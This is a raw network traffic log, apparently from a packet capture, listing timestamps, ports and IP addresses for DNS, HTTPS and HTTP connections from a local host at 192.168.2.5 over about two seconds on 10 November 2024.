Nov 10, 2024 04:55:18.654798031 CET	49751	53	192.168.2.5	1.1.1.1
Nov 10, 2024 04:55:18.654870033 CET	49751	53	192.168.2.5	1.1.1.1
Nov 10, 2024 04:55:18.654881954 CET	49751	53	192.168.2.5	1.1.1.1
Nov 10, 2024 04:55:18.659651995 CET	53	49751	1.1.1.1	192.168.2.5
Nov 10, 2024 04:55:18.659662008 CET	53	49751	1.1.1.1	192.168.2.5
Nov 10, 2024 04:55:18.664479971 CET	49751	53	192.168.2.5	1.1.1.1
Nov 10, 2024 04:55:18.665060997 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:18.665087938 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:18.665134907 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:18.665483952 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:18.665493965 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:18.712908030 CET	53	49751	1.1.1.1	192.168.2.5
Nov 10, 2024 04:55:18.856607914 CET	49761	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.856661081 CET	443	49761	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:18.856719971 CET	49761	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.858737946 CET	49762	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.858763933 CET	443	49762	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:18.858825922 CET	49762	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.859890938 CET	49763	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.859899998 CET	443	49763	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:18.860097885 CET	49763	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.860220909 CET	49764	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.860228062 CET	443	49764	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:18.860291958 CET	49764	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.869072914 CET	49764	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.869081974 CET	443	49764	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:18.869488001 CET	49763	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.869503021 CET	443	49763	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:18.869573116 CET	49761	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.869584084 CET	443	49761	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:18.869736910 CET	49762	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.869750977 CET	443	49762	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:18.869931936 CET	49768	443	192.168.2.5	18.244.18.27
Nov 10, 2024 04:55:18.869940996 CET	443	49768	18.244.18.27	192.168.2.5
Nov 10, 2024 04:55:18.870033026 CET	49768	443	192.168.2.5	18.244.18.27
Nov 10, 2024 04:55:18.870383024 CET	49768	443	192.168.2.5	18.244.18.27
Nov 10, 2024 04:55:18.870395899 CET	443	49768	18.244.18.27	192.168.2.5
Nov 10, 2024 04:55:18.873480082 CET	49726	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:18.873769999 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:18.874392033 CET	49772	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.874403954 CET	443	49772	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:18.874593019 CET	49772	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.874738932 CET	49772	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:18.874749899 CET	443	49772	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:18.878202915 CET	80	49726	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:18.878515959 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:18.878571033 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:18.889647961 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:18.889777899 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:18.894666910 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:18.894678116 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:18.894704103 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:18.894743919 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:19.124293089 CET	49773	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:19.124310970 CET	443	49773	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:19.124418974 CET	49773	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:19.125466108 CET	49773	443	192.168.2.5	40.126.31.67
Nov 10, 2024 04:55:19.125475883 CET	443	49773	40.126.31.67	192.168.2.5
Nov 10, 2024 04:55:19.139396906 CET	53	49751	1.1.1.1	192.168.2.5
Nov 10, 2024 04:55:19.139461994 CET	49751	53	192.168.2.5	1.1.1.1
Nov 10, 2024 04:55:19.514184952 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.522941113 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.522955894 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.523271084 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.523286104 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.523334026 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.523339987 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.523391008 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.523904085 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.533447981 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.533447981 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.533464909 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.533538103 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.596715927 CET	443	49764	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.598182917 CET	443	49763	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.603173018 CET	49764	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.603188038 CET	443	49764	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.603454113 CET	49763	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.603482962 CET	443	49763	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.605221033 CET	49763	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.605230093 CET	443	49763	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.605254889 CET	49764	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.605258942 CET	443	49764	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.606630087 CET	443	49762	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.606964111 CET	49762	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.606986046 CET	443	49762	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.607336044 CET	49762	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.607340097 CET	443	49762	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.612328053 CET	443	49772	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.612375975 CET	443	49761	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.612720013 CET	49761	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.612731934 CET	443	49761	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.613212109 CET	49761	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.613215923 CET	443	49761	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.616553068 CET	49772	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.616569042 CET	443	49772	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.617638111 CET	49772	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.617646933 CET	443	49772	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.664293051 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.664299011 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.721757889 CET	443	49768	18.244.18.27	192.168.2.5
Nov 10, 2024 04:55:19.722713947 CET	49768	443	192.168.2.5	18.244.18.27
Nov 10, 2024 04:55:19.722737074 CET	443	49768	18.244.18.27	192.168.2.5
Nov 10, 2024 04:55:19.723877907 CET	443	49768	18.244.18.27	192.168.2.5
Nov 10, 2024 04:55:19.723929882 CET	49768	443	192.168.2.5	18.244.18.27
Nov 10, 2024 04:55:19.725189924 CET	49768	443	192.168.2.5	18.244.18.27
Nov 10, 2024 04:55:19.725244045 CET	443	49768	18.244.18.27	192.168.2.5
Nov 10, 2024 04:55:19.729561090 CET	443	49764	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.729644060 CET	443	49764	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.729698896 CET	49764	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.730357885 CET	49764	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.730370045 CET	443	49764	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.730381012 CET	49764	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.730387926 CET	443	49764	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.731468916 CET	443	49763	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.731491089 CET	443	49763	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.731539011 CET	443	49763	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.731549978 CET	49763	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.731590033 CET	49763	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.735774994 CET	49763	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.735790968 CET	443	49763	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.735801935 CET	49763	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.735805988 CET	443	49763	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.737164021 CET	443	49762	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.737195969 CET	443	49762	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.737261057 CET	49762	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.737278938 CET	443	49762	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.737293005 CET	443	49762	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.737320900 CET	49762	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.737333059 CET	49762	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.742980003 CET	443	49772	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.742999077 CET	443	49772	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.743048906 CET	443	49772	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.743092060 CET	49772	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.743123055 CET	49772	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.744338036 CET	49762	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.744349003 CET	443	49762	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.744364977 CET	443	49761	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.744517088 CET	443	49761	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.744565964 CET	49761	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.749849081 CET	49772	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.749866009 CET	443	49772	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.749877930 CET	49772	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.749883890 CET	443	49772	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.752480984 CET	49775	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.752511024 CET	443	49775	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.752599955 CET	49775	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.754184961 CET	49776	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.754210949 CET	443	49776	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.754336119 CET	49761	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.754340887 CET	443	49761	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.754365921 CET	49776	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.755357027 CET	49776	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.755369902 CET	443	49776	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.757059097 CET	49777	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.757081032 CET	443	49777	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.757164001 CET	49777	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.757447004 CET	49777	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.757458925 CET	443	49777	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.759120941 CET	49775	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.759134054 CET	443	49775	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.760726929 CET	49778	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.760742903 CET	443	49778	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.760857105 CET	49778	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.762795925 CET	49779	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.762804031 CET	443	49779	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.762892962 CET	49779	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.762943029 CET	49778	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.762955904 CET	443	49778	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.763243914 CET	49779	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:19.763252974 CET	443	49779	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:19.776583910 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.776683092 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.776689053 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.780817986 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.780867100 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.780872107 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.789733887 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.789803982 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.789808989 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.797420979 CET	49780	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:19.797446966 CET	443	49780	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:19.797660112 CET	49780	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:19.797831059 CET	49780	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:19.797842979 CET	443	49780	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:19.798118114 CET	49781	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:19.798139095 CET	443	49781	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:19.798271894 CET	49781	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:19.798276901 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.798327923 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.798332930 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.798418999 CET	49781	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:19.798437119 CET	443	49781	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:19.807054043 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.807096958 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.807101965 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.808734894 CET	49782	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:19.808763027 CET	443	49782	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:19.808903933 CET	49782	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:19.809689999 CET	49782	443	192.168.2.5	162.159.61.3
Nov 10, 2024 04:55:19.809701920 CET	443	49782	162.159.61.3	192.168.2.5
Nov 10, 2024 04:55:19.815697908 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.815773964 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.815779924 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.844435930 CET	49768	443	192.168.2.5	18.244.18.27
Nov 10, 2024 04:55:19.844465971 CET	443	49768	18.244.18.27	192.168.2.5
Nov 10, 2024 04:55:19.867393970 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.867404938 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.893630028 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.893655062 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.893723965 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.893731117 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.893806934 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.896214008 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.900577068 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.900595903 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.900645971 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.900651932 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.900707960 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.909332991 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.918072939 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.918098927 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.918128014 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.918133974 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.918193102 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.926723957 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.935434103 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.935477018 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.935483932 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.944273949 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.944318056 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.944338083 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.944344044 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.944387913 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.950752974 CET	49768	443	192.168.2.5	18.244.18.27
Nov 10, 2024 04:55:19.952832937 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.961746931 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.961772919 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.961837053 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.961843014 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.961898088 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.969762087 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.977304935 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.977349997 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.977355957 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.977361917 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:19.977401972 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:19.984926939 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.010325909 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.010354996 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.010379076 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.010385036 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.010430098 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.010484934 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.010540009 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.010565996 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.010582924 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.010591030 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.010664940 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.015949011 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.015990973 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.016271114 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.016275883 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.020325899 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.020399094 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.020404100 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.025507927 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.025558949 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.025563955 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.030299902 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.033328056 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.033334017 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.035083055 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.037524939 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.037528992 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.040124893 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.040263891 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.040268898 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.045028925 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.045087099 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.045092106 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.049500942 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.049562931 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.049566984 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.054737091 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.054941893 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.054948092 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.058922052 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.059077978 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.059083939 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.064172983 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.065340996 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.065346956 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.068958044 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.069003105 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.069009066 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.072988987 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.073045015 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.073050022 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.077753067 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.077795982 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.077800989 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.082465887 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.082530022 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.082535982 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.087268114 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.087347031 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.087352037 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.092046976 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.092114925 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.092119932 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.097436905 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.097668886 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.097675085 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.102030039 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.102076054 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.102081060 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.106764078 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.106807947 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.106815100 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.111109018 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.111303091 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.111308098 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.115684032 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.115772009 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.115781069 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.120110989 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.120179892 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.120183945 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.124658108 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.124746084 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.124752045 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.129020929 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.129072905 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.129077911 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.133342981 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.133399963 CET	49752	443	192.168.2.5	172.217.16.193
Nov 10, 2024 04:55:20.133404970 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.137579918 CET	443	49752	172.217.16.193	192.168.2.5
Nov 10, 2024 04:55:20.137665033 CET	49752	443	192.168.2.5	172.217.16.193
